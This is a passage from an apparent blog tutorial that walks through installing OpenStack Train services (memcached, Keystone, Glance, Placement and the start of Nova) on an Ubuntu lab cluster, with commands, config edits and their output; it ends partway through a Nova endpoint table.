<p>We will be using memcached to cache parts of horizon, so go ahead and install
it on the controller:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install memcached python3-memcache
</code></pre></div></div>
<p>We need to edit the config to use the internal management network, so change the
listening address from <code class="language-plaintext highlighter-rouge">127.0.0.1</code> to <code class="language-plaintext highlighter-rouge">10.0.0.11</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo vim /etc/memcached.conf
#-l 127.0.0.1
-l 10.0.0.11
</code></pre></div></div>
<p>From there restart the memcached service:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart memcached
</code></pre></div></div>
<h1 id="installing-openstack">Installing OpenStack</h1>
<p>OpenStack is a series of services, and we will install them one at a time.</p>
<h2 id="installing-keystone-the-identity-service">Installing Keystone, the Identity Service</h2>
<p>Keystone is the identity service for OpenStack, and it maintains user
authentication, user authorisation and the catalogue of currently installed and
running OpenStack services, as well as their endpoint information.</p>
<p>Every other OpenStack service has a hard dependency on Keystone for its
authentication capabilities, and to get themselves enlisted into the catalogue,
so naturally Keystone needs to be installed first.</p>
<p>I’m going to be following the <a href="https://docs.openstack.org/keystone/train/install/">Keystone Installation Tutorial</a></p>
<h3 id="making-the-keystone-database">Making the Keystone Database</h3>
<p>Keystone needs a backing database, so open up mysql with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mysql
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 44
Server version: 10.3.20-MariaDB-0ubuntu0.19.10.1 Ubuntu 19.10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
</code></pre></div></div>
<p>From there make a database:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MariaDB [(none)]> create database keystone;
Query OK, 1 row affected (0.001 sec)
</code></pre></div></div>
<p>We then need to make a keystone user, and let them have access to the database:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MariaDB [(none)]> grant all privileges on keystone.* to 'keystone'@'localhost'
identified by 'password123';
Query OK, 0 rows affected (0.001 sec)
MariaDB [(none)]> grant all privileges on keystone.* to 'keystone'@'%'
identified by 'password123';
Query OK, 0 rows affected (0.001 sec)
</code></pre></div></div>
<h3 id="installing-keystone-packages">Installing Keystone Packages</h3>
<p>Keystone is available in the Ubuntu main archive, so we can install it with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install keystone apache2 libapache2-mod-wsgi-py3
</code></pre></div></div>
<p>From there, we can configure it by adding some credentials to its configuration
file. You will want to jump to the <code class="language-plaintext highlighter-rouge">database</code> section, comment out the sqlite
connection, and add our mariadb database. Also, under the <code class="language-plaintext highlighter-rouge">token</code> section,
uncomment the <code class="language-plaintext highlighter-rouge">provider = fernet</code> line:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/keystone/keystone.conf
[database]
#connection = sqlite:////var/lib/keystone/keystone.db
connection = mysql+pymysql://keystone:password123@controller/keystone
[token]
provider = fernet
</code></pre></div></div>
<p>We can then populate the database with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo -s
# su -s /bin/sh -c "keystone-manage db_sync" keystone
</code></pre></div></div>
<p>Once the database is populated, we need to initialise the fernet key repositories:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo keystone-manage fernet_setup --keystone-user keystone --keystone-group \
keystone
$ sudo keystone-manage credential_setup --keystone-user keystone --keystone-group \
keystone
</code></pre></div></div>
<p>After that, we can bootstrap keystone by telling it where it’s API endpoints
will be accessed from, and what our region name will be.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo keystone-manage bootstrap --bootstrap-password openstack \
--bootstrap-admin-url http://controller:5000/v3/ \
--bootstrap-internal-url http://controller:5000/v3/ \
--bootstrap-public-url http://controller:5000/v3/ \
--bootstrap-region-id RegionOne
</code></pre></div></div>
<p>Most OpenStack services have three main endpoints, designed to be accessed by
users of differing permissions. The admin endpoint is intended by OpenStack
administrators, the internal endpoint is for service to service communication,
for example, between keystone and nova, and lastly, the public endpoint is for
anyone to query.</p>
<p>I used the password “openstack” here, and we will use it for front end OpenStack
services. You can use whatever you like, as long as you are consistent.</p>
<p>Just a few last things now. We need to add some configuration to apache:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/apache2/apache2.conf
ServerName controller
</code></pre></div></div>
<p>Save, and restart the apache service:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart apache2
</code></pre></div></div>
<h3 id="creating-users-roles-and-projects-in-keystone">Creating Users, Roles and Projects in Keystone</h3>
<p>First up is creating a project. We need to set some environment variables to
feed into keystone, like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ export OS_USERNAME=admin
$ export OS_PASSWORD=openstack
$ export OS_PROJECT_NAME=admin
$ export OS_USER_DOMAIN_NAME=Default
$ export OS_PROJECT_DOMAIN_NAME=Default
$ export OS_AUTH_URL=http://controller:5000/v3
$ export OS_IDENTITY_API_VERSION=3
</code></pre></div></div>
<p>After that, we can go and create some projects:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack project create --domain default --description "Service Project" service
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | Service Project |
| domain_id | default |
| enabled | True |
| id | c050173209284c80816cab4a42e829bb |
| is_domain | False |
| name | service |
| options | {} |
| parent_id | default |
| tags | [] |
+-------------+----------------------------------+
$ openstack project create --domain default --description "Demo Project" demo
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | Demo Project |
| domain_id | default |
| enabled | True |
| id | 33569bb56110474db2d584b4a1936c6b |
| is_domain | False |
| name | demo |
| options | {} |
| parent_id | default |
| tags | [] |
+-------------+----------------------------------+
</code></pre></div></div>
<p>We should make some users that are not administrators to use things normally,
so we can make them like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack user create --domain default --password-prompt demo
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field | Value |
+---------------------+----------------------------------+
| domain_id | default |
| enabled | True |
| id | bf0cfff44d3c49cb92d10e5977a9decc |
| name | demo |
| options | {} |
| password_expires_at | None |
+---------------------+----------------------------------+
$ openstack role create user
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | None |
| domain_id | None |
| id | 591b3b65831847a5b7eb60e9bcef0f1c |
| name | user |
| options | {} |
+-------------+----------------------------------+
$ openstack role add --project demo --user demo user
</code></pre></div></div>
<p>We made a project called demo, and inside that, we made a role called user, and
added our account, demo, to that role.</p>
<h3 id="verifying-that-keystone-was-installed-correctly">Verifying that Keystone was Installed Correctly</h3>
<p>We can check to see if our users and projects are created properly, by unsetting
the environment variables we set.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ unset OS_AUTH_URL OS_PASSWORD
</code></pre></div></div>
<p>From there, we can request a token for both of our users, admin and demo.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack --os-auth-url http://controller:5000/v3 \
--os-project-domain-name Default --os-user-domain-name Default \
--os-project-name admin --os-username admin token issue
Password:
+------------+-----------------------------------------------------------------+
| Field | Value |
+------------+-----------------------------------------------------------------+
| expires | 2020-01-27T03:23:56+0000 |
| id | gAAAAABeLkm86gLK4PJXGCrFytreNRz68VT_10sfa9aG8kBWhvWGFM36y9tSrBO |
| | 8-QagpervkRxePXB0ZgriZ4K7Lh5Ozoe2_JNj9wtlVs4VAfSyb66c35YOGIMaQs |
| | oKfBGEuYjrfG-22UbT9zWHUw3GoRx37_VBpr13inGQhIBm7HVE9AWv0KI |
| project_id | a45f9c52c6964c5da7585f5c8a70fdc7 |
| user_id | c23d6d5a0b8f4dae96f5156d62d62dbd |
+------------+-----------------------------------------------------------------+
</code></pre></div></div>
<p>And the demo user:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack --os-auth-url http://controller:5000/v3 \
--os-project-domain-name Default --os-user-domain-name Default \
--os-project-name demo --os-username demo token issue
Password:
+------------+-----------------------------------------------------------------+
| Field | Value |
+------------+-----------------------------------------------------------------+
| expires | 2020-01-27T03:28:07+0000 |
| id | gAAAAABeLkq30a-m6Cpcv3U9tBpZyJia4dQXoUhV73QzW9kH08cGzhnIUvWeCv8 |
| | BE0Nag6Lb4DKgiWXtiSpzSyJaXARwJsWN8U1lHIUG8FA2nQHDHPeVBao8GJgSec |
| | n9thhc19CMPcK7UUZqlrMm84i8bC4baU08LsG7JvGZ4cPRoEiB-OZVgg |
| project_id | 33569bb56110474db2d584b4a1936c6b |
| user_id | bf0cfff44d3c49cb92d10e5977a9decc |
+------------+-----------------------------------------------------------------+
</code></pre></div></div>
<p>To make things easier when dealing with different users in our OpenStack cluster,
OpenStack has this idea of saving a collection of environment variables for
a user into a bash script, and we can source them, and then use them for
anything we want.</p>
<p>This is known as “OpenStack client environment scripts”, so let’s take a look.
Make two files, one called <code class="language-plaintext highlighter-rouge">admin-openrc</code> and the other <code class="language-plaintext highlighter-rouge">demo-openrc</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ vim admin-openrc
export OS_USERNAME=admin
export OS_PASSWORD=openstack
export OS_PROJECT_NAME=admin
export OS_USER_DOMAIN_NAME=Default
export OS_PROJECT_DOMAIN_NAME=Default
export OS_AUTH_URL=http://controller:5000/v3
export OS_IDENTITY_API_VERSION=3
export OS_IMAGE_API_VERSION=2
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ vim demo-openrc
export OS_USERNAME=demo
export OS_PASSWORD=openstack
export OS_PROJECT_NAME=demo
export OS_USER_DOMAIN_NAME=Default
export OS_PROJECT_DOMAIN_NAME=Default
export OS_AUTH_URL=http://controller:5000/v3
export OS_IDENTITY_API_VERSION=3
export OS_IMAGE_API_VERSION=2
</code></pre></div></div>
<p>Then if we want to change to the admin user, we can just source it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . admin-openrc
$ openstack token issue
+------------+-----------------------------------------------------------------+
| Field | Value |
+------------+-----------------------------------------------------------------+
| expires | 2020-01-27T03:44:52+0000 |
| id | gAAAAABeLk6k6b6CVGwnigP8DF6iZUieU1H_J_Sdhdr0KZaFN4OULhVndFvPt1N |
| | 5EAReAiAZl7Kmx_16KXkB3fQ4dFr_N5_id3UyEjcqWFsFp2kN5EjtA674ubG4CL |
| | 3auzXEvlrx5pmS0pl_hd0UQQGO7DfF3vHo-ksvcA9x7rETUS1UfWYXMXE |
| project_id | a45f9c52c6964c5da7585f5c8a70fdc7 |
| user_id | c23d6d5a0b8f4dae96f5156d62d62dbd |
+------------+-----------------------------------------------------------------+
</code></pre></div></div>
<p>That actually makes switching user’s pretty easy. Still, you leave creds lying
around on your machines the whole time, which makes me uneasy. For our toy
cluster it doesn’t matter, but for bigger deployments it is concerning.</p>
<h2 id="installing-glance-the-image-service">Installing Glance, the Image Service</h2>
<p>Glance is the image service for OpenStack. It is in charge of discovering,
registering and retrieving virtual machine operating system images.</p>
<p>Glance also allows users to build their own images, and take snapshots.</p>
<p>I will be following the <a href="https://docs.openstack.org/glance/train/install/install-ubuntu.html">Glance Installation Documentation</a>.</p>
<h3 id="creating-the-glance-database">Creating the Glance Database</h3>
<p>Back to the controller node, since Glance will be installed there as well.</p>
<p>We need to create a database for Glance, so go ahead and open up the mysql
monitor, and issue:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mysql
MariaDB [(none)]> create database glance;
Query OK, 1 row affected (0.000 sec)
</code></pre></div></div>
<p>From there, just like with Keystone, we need to make a user, and grant them
access the glance database.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MariaDB [(none)]> grant all privileges on glance.* to 'glance'@'localhost' identified by 'password123';
Query OK, 0 rows affected (0.001 sec)
MariaDB [(none)]> grant all privileges on glance.* to 'glance'@'%' identified by 'password123';
Query OK, 0 rows affected (0.001 sec)
</code></pre></div></div>
<p>Now we need to make the glance user in OpenStack. To do this, we need to become
the <code class="language-plaintext highlighter-rouge">admin</code> user, so source the <code class="language-plaintext highlighter-rouge">admin-openrc</code> file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . admin-openrc
$ openstack user create --domain default --password-prompt glance
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field | Value |
+---------------------+----------------------------------+
| domain_id | default |
| enabled | True |
| id | 7238c0c8862d4a63b95143e6a42d683b |
| name | glance |
| options | {} |
| password_expires_at | None |
+---------------------+----------------------------------+
</code></pre></div></div>
<p>Next, we need to add the glance user to the admin role of the services project:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack role add --project service --user glance admin
</code></pre></div></div>
<p>Now we need to define the service to add, and set up the endpoints:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack service create --name glance --description "OpenStack Image" image
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | OpenStack Image |
| enabled | True |
| id | 062afb3d1c4345c89d808548c2ec53f9 |
| name | glance |
| type | image |
+-------------+----------------------------------+
</code></pre></div></div>
<p>We can set up our endpoints with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack endpoint create --region RegionOne image public http://controller:9292
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | 31b50e9589e74c9b839091f3a5e41688 |
| interface | public |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 062afb3d1c4345c89d808548c2ec53f9 |
| service_name | glance |
| service_type | image |
| url | http://controller:9292 |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne image internal http://controller:9292
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | ba685939d6344808828a6cb6a5426dee |
| interface | internal |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 062afb3d1c4345c89d808548c2ec53f9 |
| service_name | glance |
| service_type | image |
| url | http://controller:9292 |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne image admin http://controller:9292
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | 53dcf790c16d4275a1ddf52556eccbed |
| interface | admin |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 062afb3d1c4345c89d808548c2ec53f9 |
| service_name | glance |
| service_type | image |
| url | http://controller:9292 |
+--------------+----------------------------------+
</code></pre></div></div>
<p>From the URL, we can see that glance will use the <code class="language-plaintext highlighter-rouge">9292</code> port.</p>
<p>Now that the endpoint is created, we can install the glance package:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install glance
</code></pre></div></div>
<p>Just like keystone, we need to edit the API file to enter the credentials
glance will use to access its database.</p>
<p>Mine already has sqlite configured, so comment it out and add:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/glance/glance-api.conf
[database]
#connection = sqlite:////var/lib/glance/glance.sqlite
#backend = sqlalchemy
connection = mysql+pymysql://glance:password123@controller/glance
</code></pre></div></div>
<p>Next, we need to modify the <code class="language-plaintext highlighter-rouge">[keystone_authtoken]</code> sections:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[keystone_authtoken]
www_authenticate_uri = http://controller:5000
auth_url = http://controller:5000
memcached_servers = controller:11211
auth_type = password
project_domain_name = Default
user_domain_name = Default
project_name = service
username = glance
password = openstack
</code></pre></div></div>
<p>A small edit for <code class="language-plaintext highlighter-rouge">[paste_deploy]</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[paste_deploy]
flavor = keystone
</code></pre></div></div>
<p>Another edit for <code class="language-plaintext highlighter-rouge">[glance_store]</code> to say we will use the file system to store
our images:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[glance_store]
stores = file,http
default_store = file
filesystem_store_datadir = /var/lib/glance/images/
</code></pre></div></div>
<p>Finally, save and exit your editor.</p>
<p>We can populate the database with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo -s
# su -s /bin/sh -c "glance-manage db_sync" glance
</code></pre></div></div>
<p>There is going to be a lot of scary output, but you can ignore it. It is mostly
statements saying that database upgrade completed successfully across any older
glance versions.</p>
<p>From there, we can restart the glance service to reload the config:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart glance-api
</code></pre></div></div>
<h3 id="verifying-that-glance-was-installed-correctly">Verifying that Glance was Installed Correctly</h3>
<p>All the OpenStack tutorials seem to use <a href="http://launchpad.net/cirros">Cirros</a>
to their deployments, so we will go see what all the fuss is about.</p>
<p>Source the admin creds since we will need administrative permissions:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . admin-openrc
</code></pre></div></div>
<p>Download the ISO image:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ wget http://download.cirros-cloud.net/0.4.0/cirros-0.4.0-x86_64-disk.img
</code></pre></div></div>
<p>Woah! Its only 12.13 megabytes! That’s crazy! Maybe its popular since its small.</p>
<p>We can upload the image to glance with the following command:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack image create --file cirros-0.4.0-x86_64-disk.img --disk-format \
qcow2 --container-format bare --public cirros
+------------------+------------------------------------------------------+
| Field | Value |
+------------------+------------------------------------------------------+
| checksum | 443b7623e27ecf03dc9e01ee93f67afe |
| container_format | bare |
| created_at | 2020-01-27T04:17:35Z |
| disk_format | qcow2 |
| file | /v2/images/5ad293f2-1d07-44ae-8a23-19d619885a3b/file |
| id | 5ad293f2-1d07-44ae-8a23-19d619885a3b |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros |
| owner | a45f9c52c6964c5da7585f5c8a70fdc7 |
| properties | os_hash_algo='sha512', os_hash_value='6513f21e44aa3d |
| | a349f248188a44bc304a3653a04122d8fb4535423c8e1d14cd6a |
| | 153f735bb0982e2161b5b5186106570c17a9e58b64dd39390617 |
| | cd5a350f78', os_hidden='False' |
| protected | False |
| schema | /v2/schemas/image |
| size | 12716032 |
| status | active |
| tags | |
| updated_at | 2020-01-27T04:17:36Z |
| virtual_size | None |
| visibility | public |
+------------------+------------------------------------------------------+
</code></pre></div></div>
<p>We can check to see if it was imported correctly with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack image list
+--------------------------------------+--------+--------+
| ID | Name | Status |
+--------------------------------------+--------+--------+
| 5ad293f2-1d07-44ae-8a23-19d619885a3b | cirros | active |
+--------------------------------------+--------+--------+
</code></pre></div></div>
<p>That’s it! We have Glance installed and configured now.</p>
<h2 id="installing-placement-the-resource-tracking-service">Installing Placement, the Resource Tracking Service</h2>
<p>Placement allows OpenStack services to track resources within themselves, and
when seeing how many resource they have left to consume, you can sets traits
about those resources, such as if they have any machines with a SSD, or a SR_IOV
network capable NIC, for example.</p>
<p>Placement used to be a part of Nova, but it was split out in the Stein release,
so we need to go ahead and install it before we can install Nova.</p>
<p>I’m going to be following the <a href="https://docs.openstack.org/placement/train/install/install-ubuntu.html">Placement Install Documentation</a></p>
<h3 id="setting-up-the-database-on-the-controller">Setting Up the Database On the Controller</h3>
<p>Placement has its own database, so let’s go ahead and make one:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mysql
MariaDB [(none)]> CREATE DATABASE placement;
Query OK, 1 row affected (0.001 sec)
MariaDB [(none)]> GRANT ALL PRIVILEGES ON placement.* TO 'placement'@'localhost' \
IDENTIFIED BY 'password123';
Query OK, 0 rows affected (0.000 sec)
MariaDB [(none)]> GRANT ALL PRIVILEGES ON placement.* TO 'placement'@'%' \
IDENTIFIED BY 'password123';
Query OK, 0 rows affected (0.000 sec)
</code></pre></div></div>
<h3 id="creating-a-user-and-the-endpoints">Creating a User and the Endpoints</h3>
<p>Let’s make a user for placement and add it to the admin role:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack user create --domain default --password-prompt placement
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field | Value |
+---------------------+----------------------------------+
| domain_id | default |
| enabled | True |
| id | aca47b0613d443118363f40e59b4870d |
| name | placement |
| options | {} |
| password_expires_at | None |
+---------------------+----------------------------------+
$ openstack role add --project service --user placement admin
</code></pre></div></div>
<p>We can then create the Placement service and set up its endpoints:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack service create --name placement --description "Placement API" placement
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | Placement API |
| enabled | True |
| id | b1c3c8a8441d456a9c8ac34c668e39f6 |
| name | placement |
| type | placement |
+-------------+----------------------------------+
</code></pre></div></div>
<p>Making the public, internal and admin endpoints:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack endpoint create --region RegionOne placement public http://controller:8778
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | b018157a7c2b46da8aa8d99d2477cc54 |
| interface | public |
| region | RegionOne |
| region_id | RegionOne |
| service_id | b1c3c8a8441d456a9c8ac34c668e39f6 |
| service_name | placement |
| service_type | placement |
| url | http://controller:8778 |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne placement internal http://controller:8778
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | 4aa4ff0b45fc48ae8f456fcf40ed7e8e |
| interface | internal |
| region | RegionOne |
| region_id | RegionOne |
| service_id | b1c3c8a8441d456a9c8ac34c668e39f6 |
| service_name | placement |
| service_type | placement |
| url | http://controller:8778 |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne placement admin http://controller:8778
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | d475a4976eb34f6d9619dc72e4591736 |
| interface | admin |
| region | RegionOne |
| region_id | RegionOne |
| service_id | b1c3c8a8441d456a9c8ac34c668e39f6 |
| service_name | placement |
| service_type | placement |
| url | http://controller:8778 |
+--------------+----------------------------------+
</code></pre></div></div>
<h3 id="installing-and-configuring-the-placement-packages">Installing and Configuring the Placement Packages</h3>
<p>We can install placement with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install placement-api
</code></pre></div></div>
<p>From there, we can enable access to its database by editing its configuration
file. Comment out the sqlite connection and add our mysql connection:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/placement/placement.conf
[placement_database]
#connection = sqlite:////var/lib/placement/placement.sqlite
connection = mysql+pymysql://placement:password123@controller/placement
</code></pre></div></div>
<p>Next head to the <code class="language-plaintext highlighter-rouge">[api]</code> and <code class="language-plaintext highlighter-rouge">[keystone_authentication]</code> sections and add the
following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[api]
auth_strategy = keystone
[keystone_authtoken]
auth_url = http://controller:5000/v3
memcached_servers = controller:11211
auth_type = password
project_domain_name = Default
user_domain_name = Default
project_name = service
username = placement
password = openstack
</code></pre></div></div>
<p>Note the password is the same as the one you used when you created the placement
user earlier.</p>
<p>From there, we can populate the database with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo -s
# su -s /bin/sh -c "placement-manage db sync" placement
# exit
$ sudo systemctl restart apache2
</code></pre></div></div>
<h3 id="verify-that-placement-works">Verify that Placement Works</h3>
<p>The osc-placement plugin allows us to query the placement API for its internal
data, so let’s install it and give it a go:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install python3-osc-placement
</code></pre></div></div>
<p>Once that is done, we can query the placement API with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack --os-placement-api-version 1.2 resource class list --sort-column name
+----------------------------+
| name |
+----------------------------+
| DISK_GB |
| FPGA |
| IPV4_ADDRESS |
| MEMORY_MB |
| MEM_ENCRYPTION_CONTEXT |
| NET_BW_EGR_KILOBIT_PER_SEC |
| NET_BW_IGR_KILOBIT_PER_SEC |
| NUMA_CORE |
| NUMA_MEMORY_MB |
| NUMA_SOCKET |
| NUMA_THREAD |
| PCI_DEVICE |
| PCPU |
| PGPU |
| SRIOV_NET_VF |
| VCPU |
| VGPU |
| VGPU_DISPLAY_HEAD |
+----------------------------+
</code></pre></div></div>
<p>It seems like it is working. Great!</p>
<h2 id="installing-nova-the-compute-service">Installing Nova, the Compute Service</h2>
<p>Nova is the compute service for OpenStack. It is responsible for taking requests
to provision a virtual machine, deciding on what compute host the instance will
be launched by looking at resources available in the pool, and interacting with
the underlying hypervisor to create and manage the virtual machine.</p>
<p>Nova supports many different hypervisors, and in this deployment, we will have
a single compute node which uses QEMU / KVM.</p>
<p>I’m going to be following the <a href="https://docs.openstack.org/nova/train/install/controller-install-ubuntu.html">Nova Controller Install Documentation</a>.</p>
<h3 id="setting-up-the-databases-services-and-endpoints-for-nova">Setting up the Databases, Services and Endpoints for Nova</h3>
<p>We need to configure Nova services on the controller and the compute node, so we
will begin by setting up some databases.</p>
<p>On the controller, open up the <code class="language-plaintext highlighter-rouge">mysql monitor</code>, and make databases for nova_api,
nova and nova_cell0.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mysql
MariaDB [(none)]> CREATE DATABASE nova_api;
Query OK, 1 row affected (0.001 sec)
MariaDB [(none)]> CREATE DATABASE nova;
Query OK, 1 row affected (0.000 sec)
MariaDB [(none)]> CREATE DATABASE nova_cell0;
Query OK, 1 row affected (0.000 sec)
</code></pre></div></div>
<p>As usual, we also need to grant some privileges:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MariaDB [(none)]> GRANT ALL PRIVILEGES ON nova_api.* TO 'nova'@'localhost' \
IDENTIFIED BY 'password123';
MariaDB [(none)]> GRANT ALL PRIVILEGES ON nova_api.* TO 'nova'@'%' \
IDENTIFIED BY 'password123';
MariaDB [(none)]> GRANT ALL PRIVILEGES ON nova.* TO 'nova'@'localhost' \
IDENTIFIED BY 'password123';
MariaDB [(none)]> GRANT ALL PRIVILEGES ON nova.* TO 'nova'@'%' \
IDENTIFIED BY 'password123';
MariaDB [(none)]> GRANT ALL PRIVILEGES ON nova_cell0.* TO 'nova'@'localhost' \
IDENTIFIED BY 'password123';
MariaDB [(none)]> GRANT ALL PRIVILEGES ON nova_cell0.* TO 'nova'@'%' \
IDENTIFIED BY 'password123';
</code></pre></div></div>
<p>Next, we need to create a nova user and add it to the admin role:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack user create --domain default --password-prompt nova
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field | Value |
+---------------------+----------------------------------+
| domain_id | default |
| enabled | True |
| id | d6f43252051e43fe9cf7dbcc9b538751 |
| name | nova |
| options | {} |
| password_expires_at | None |
+---------------------+----------------------------------+
$ openstack role add --project service --user nova admin
</code></pre></div></div>
<p>From there we need to create the Nova service, and set up its endpoints:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack service create --name nova --description "OpenStack Compute" compute
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | OpenStack Compute |
| enabled | True |
| id | 2364a25accfc4f8e9925009b152262f9 |
| name | nova |
| type | compute |
+-------------+----------------------------------+
</code></pre></div></div>
<p>Public, internal and admin endpoints:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack endpoint create --region RegionOne compute public http://controller:8774/v2.1
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | ed31df66c2ce45c981070395bf32eed4 |
| interface | public |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 2364a25accfc4f8e9925009b152262f9 |
| service_name | nova |
| service_type | compute |
| url | http://controller:8774/v2.1 |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne compute internal http://controller:8774/v2.1
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | 2429b84a9157442688867c80863373f9 |
| interface | internal |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 2364a25accfc4f8e9925009b152262f9 |
| service_name | nova |
| service_type | compute |
| url | http://controller:8774/v2.1 |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne compute admin http://controller:8774/v2.1
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | 27d6020c0c49436480febef5273a5b37 |
| interface | admin |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 2364a25accfc4f8e9925009b152262f9 |
| service_name | nova |
| service_type | compute |
| url | http://controller:8774/v2.1 |
